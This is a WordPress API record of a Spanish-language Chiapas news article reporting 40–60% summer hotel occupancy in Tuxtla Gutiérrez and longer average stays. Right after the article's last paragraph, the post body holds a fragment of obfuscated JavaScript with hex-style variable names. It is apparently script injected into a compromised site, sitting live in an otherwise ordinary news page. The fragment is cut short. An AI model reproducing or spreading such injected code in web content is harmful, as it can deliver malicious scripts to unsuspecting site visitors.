{"id":17584,"date":"2024-08-30T06:18:22","date_gmt":"2024-08-30T06:18:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17584"},"modified":"2024-08-30T06:18:23","modified_gmt":"2024-08-30T06:18:23","slug":"tuxtla-repunta-en-ocupacion-hotelera","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17584","title":{"rendered":"Tuxtla, repunta en ocupaci\u00f3n hotelera"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"636\" height=\"449\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724998599848.jpg\" alt=\"\" class=\"wp-image-17585\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724998599848.jpg 636w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1724998599848-300x212.jpg 300w\" sizes=\"auto, (max-width: 636px) 100vw, 636px\" \/><\/figure>\n\n\n\n<p>Miguel Mart\u00ednez.<\/p>\n\n\n\n<p>29 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; La Asociaci\u00f3n de Hoteles y Moteles del Centro de Chiapas, dio a conocer que al finalizar las vacaciones de verano, se obtuvo un registro de ocupaci\u00f3n entre el 40 y 60 por ciento, consider\u00e1ndose as\u00ed, una temporada \u201caceptable\u201d para este sector.<\/p>\n\n\n\n<p>Manuel Ni\u00f1o Guti\u00e9rrez, presidente de la asociaci\u00f3n, dio a conocer que, hablando concretamente de la capital chiapaneca, se tuvo un comportamiento at\u00edpico, pero ha sido constante a diferencia de otros lugares como San Crist\u00f3bal de Las Casas donde ha ido diminuyendo.<\/p>\n\n\n\n<p>Consider\u00f3 que, gracias a los trabajos de promoci\u00f3n realizados para el estado de Chiapas han dado resultados y Tuxtla se ha posicionado como un centro de distribuci\u00f3n de turismo.<\/p>\n\n\n\n<p>\u201cEn el caso de las vacaciones de verano, tenemos registros desde un 40 al 60%. Si hablamos de la zona Poniente hubo mejor ocupaci\u00f3n que en el centro de la ciudad, donde hubo d\u00edas del periodo vacaciones que estuvieron al 20%\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Record\u00f3 que, Tuxtla Guti\u00e9rrez cuanta con una infraestructura hotelera importante, contando con m\u00e1s de 5 mil cuartos disponibles para hospedar al turismo.<\/p>\n\n\n\n<p>\u201cHemos sido un sector que hemos trabajado, que hemos promocionado a los destinos de Chiapas sin distinci\u00f3n alguna, en conjunto con las autoridades de turismo\u201d, expres\u00f3.<\/p>\n\n\n\n<p>En el caso de la asociaci\u00f3n que representa destac\u00f3 que, esta labor se ha visto reflejada en la pernocta que se ha registrado en los \u00faltimos dos a\u00f1os.<\/p>\n\n\n\n<p>\u201cCuando nosotros comenzamos est\u00e1bamos en una pernocta de 1.2 noches, ahora estamos en 2.4-2.6 noches, lo que representa un avance significativo, y nos acerca las tres noches de pernocta que ser\u00eda maravilloso\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Consider\u00f3 que, el periodo vacacional de verano fue \u201caceptable\u201d, y redoblar\u00e1n esfuerzos para llegar a tener mejores n\u00fameros.<\/p>\n\n\n\n<p>\u201cNosotros ofrecemos el mejor servicio, damos la mejor presentaci\u00f3n al turismo y en eso seguiremos trabajando\u201d, subray\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Miguel Mart\u00ednez. 29 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; La Asociaci\u00f3n de Hoteles y Moteles del Centro de Chiapas, dio a conocer que al finalizar las vacaciones de verano, se obtuvo un registro de ocupaci\u00f3n entre el 40 y 60 por ciento, consider\u00e1ndose as\u00ed, una temporada \u201caceptable\u201d para este sector. Manuel Ni\u00f1o Guti\u00e9rrez, presidente &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17584","post","type-post","status-publish","format-standard","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17584","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17584"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17584\/revisions"}],"predecessor-version":[{"id":17586,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17584\/revisions\/17586"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17584"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17584"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17584"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}